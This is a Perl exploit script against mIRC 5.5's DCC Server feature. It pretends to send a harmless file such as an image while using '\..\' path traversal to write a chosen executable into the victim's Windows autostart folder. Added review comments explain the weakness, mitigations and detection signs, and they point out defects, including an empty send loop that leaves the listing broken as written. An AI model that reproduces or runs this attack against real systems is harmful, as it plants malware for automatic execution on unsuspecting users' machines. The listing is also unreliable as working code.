#!/usr/bin/perl
# Mirc 5.5 'DCC Server' pathbug(balu) tool. - typo@inferno.tusculum.edu
#
# bug description: mirc 5.5's newly introduced dcc server feature doesn't
# filter metachars(such as . and \) from sent filenames. this script fakes the
# sending of a harmless file and then puts malicious file in a wanted
# destination dir on the same harddrive (autostart dir is a good choice)
#
# usage: ./balu.pl <(any)nick>
#
#
# Review notes (defender's reading of this listing):
#   - Weakness class: path traversal via an unsanitized filename in the
#     DCC Server "120" handshake line.  The peer-supplied name is used as a
#     local path on the receiving side, so "..\" segments leave the
#     download directory.
#   - Mitigation on a receiver: keep only the basename of any peer-supplied
#     filename, reject names containing "..", "/" or "\", canonicalize the
#     final path and confirm it still lies under the download directory.
#   - Detection: DCC handshake lines whose filename field contains ".." or
#     path separators, or whose filename is padded with long runs of spaces.
#   - Code quality: no `use strict`/`use warnings`, undeclared package
#     globals, bareword FILE handle opened with unchecked 2-arg open, `goto`
#     to a label, and an empty `while ()` condition (see below).

use IO::Socket;

# Five required positional arguments; each `die` message doubles as usage text.
$host = shift or die 'need a host to connect to.';
chomp $host;
$nick = shift or die 'need source nick (e.g. satan)';
chomp $nick;
$file = shift or die 'need a file to send (eg: ./evil.exe).';
chomp $file;
$ffile = shift or die 'need a fake filename to send (eg: teen5.jpg).';
chomp $ffile;
$rfile = shift or die 'need remote filename+path, eg(including the \'\'s): \'windows\startm~1\progra~1\autostart\bla.exe\' (which is the path of autostart in german win95)';
chomp $rfile;

# Only $size is used below; the other stat fields are unpacked and ignored.
# stat() failing (missing $file) leaves $size undef and is not checked here.
($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size,$atime,$mtime,$ctime,$blksize,$blocks) = stat($file);

# Connects to TCP port 59 on $host (the DCC Server port used by this listing).
$mysock = IO::Socket::INET->new("$host:59") or die "can't connect to $host:59";

#$mysock->send("100 bla\n");
# Handshake line: "120 <nick> <size> <fake name>", 74 spaces of padding, then
# a "\..\..\..\..\..\" prefix in front of $rfile.  The leading `defined`
# only tests send()'s return value in void context; a failed send is not
# detected.
defined $mysock -> send("120 $nick $size $ffile" . ' ' x 74 . '\..\..\..\..\..\\' . $rfile);

# Read the reply one byte at a time into $foo until a newline arrives.
FOO: while (defined $mysock) {
    $mysock->recv($bla,1);
    last FOO if $bla eq "\n";
    $foo .= $bla;
    # NOTE(review): both guards duplicate the loop condition / recv result.
    # recv() on a closed peer presumably leaves $bla defined but empty, so
    # this loop could spin without ever reaching the label - TODO confirm.
    goto exit if (!defined $mysock);
    goto exit if (!defined $bla);
}

# Reply is split into at most three space-separated fields; the third is
# read as a resume offset.
($f1,$f2,$f3) = split(/ /,$foo, 3);
print "Nick of receiver: $f2 - Resume requested at offset: $f3\n";

# Numeric compare on a network-supplied string: a missing or non-numeric
# $f3 is treated as 0 (with a warning under `use warnings`).
if ($f3 != 0) {
    print "Error: $f2 wants to resume.. aborting! Try another remote filename.\n";
    goto exit;
}

print "sending... ";
# 2-arg open on a bareword handle with no error check; an unreadable $file
# is silently ignored here.
open(FILE,$file);
# NOTE(review): the loop condition is empty in this listing, so as written
# this never terminates; the readline was probably lost in extraction.
while () {
    $mysock->send($_);
}

exit:
print "done.\n";
$mysock->close;